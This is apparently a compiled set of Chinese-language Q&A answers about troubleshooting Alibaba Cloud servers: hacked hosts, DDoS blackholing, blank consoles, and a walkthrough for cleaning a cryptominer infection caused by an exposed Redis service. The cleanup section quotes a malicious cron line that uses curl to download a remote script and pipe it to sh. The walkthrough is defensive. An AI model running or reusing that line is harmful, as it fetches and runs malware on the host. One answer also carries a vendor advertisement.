① 阿里雲ECS伺服器對外攻擊,怎麼解決
伺服器被黑了,保存數據,重做系統。伺服器
② 網站被DDOS攻擊 IP被阿里雲拉黑洞了怎麼辦
阿里雲自帶的防禦流量才5G,超過就會直接黑洞處理,因為怕影響伺服器上其他IP,普通的幾百幾千的高防防禦能力都比較小,流量大點就防不住,能防幾百上千G的就要上萬,企業如果對成本控制有要求的話,可以選擇墨者.安全的集群防護,防禦能力是很不錯的,成本也比阿里雲、網易雲、騰訊雲這些大牌低,非常實在。
③ 伺服器被黑怎麼辦
1、斷開伺服器網路,檢查伺服器日誌。
2、根據日誌找出問題所在,修復系統漏洞。
3、然後將伺服器的數據清除,用原來備份的數據恢復。
4、然後重新連接網路使用。
④ 阿里雲伺服器進去全黑是怎麼回事
如果說進入雲伺服器管理控制台是這樣的話,你只需要移動一下滑鼠,或者按任意鍵盤按鍵激活顯示就可以的,或者是你可以重啟一下雲伺服器(雲伺服器出現故障也會這樣),方法是在控制台-雲伺服器ECS-找到你那台需要重啟的ECS-更多-重啟 即可,這時會彈出提示框提示你是否重啟,建議你選擇強制重啟。
還有就是LIUNX系統(例如UBUNTU也是需要用命令行操作的,你看到全黑有字元的話那就是命令行)
⑤ 阿里雲伺服器運行中總是無法訪問怎麼辦
延遲高、或者安全組沒有添加對應埠,都有可能導致這個問題。
⑥ linux阿里雲伺服器處於休眠狀態長時間黑屏怎麼處理
那不叫黑屏,是你沒配置,不會配置雲伺服器用虛擬主機吧,雲伺服器需要配置,沒基礎很麻煩
⑦ 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白
1. 關閉訪問挖礦伺服器的訪問
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉執行許可權, 在沒有找到根源前,千萬不要刪除 minerd,因為刪除了,過一回會自動有生成一個。
3. pkill minerd ,殺掉進程
4. service stop crond 或者 crontab -r 刪除所有的執行計劃
5. 執行top,查看了一會,沒有再發現minerd 進程了。
6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。
下載腳本的語句:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下,感興趣的可以研究下:
View Code
解決minerd並不是最終的目的,主要是要查找問題根源,我的伺服器問題出在了redis服務了,黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權,http://blog.jobbole.com/94518/然後就注入了病毒,下面是解決辦法和清除工作:
1. 修復 redis 的後門,
配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」,區分普通用戶和admin許可權,普通用戶將會被禁止運行某些命令,如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號
3. 查看你的用戶列表,是不是有你不認識的用戶添加進來。 如果有就刪除掉.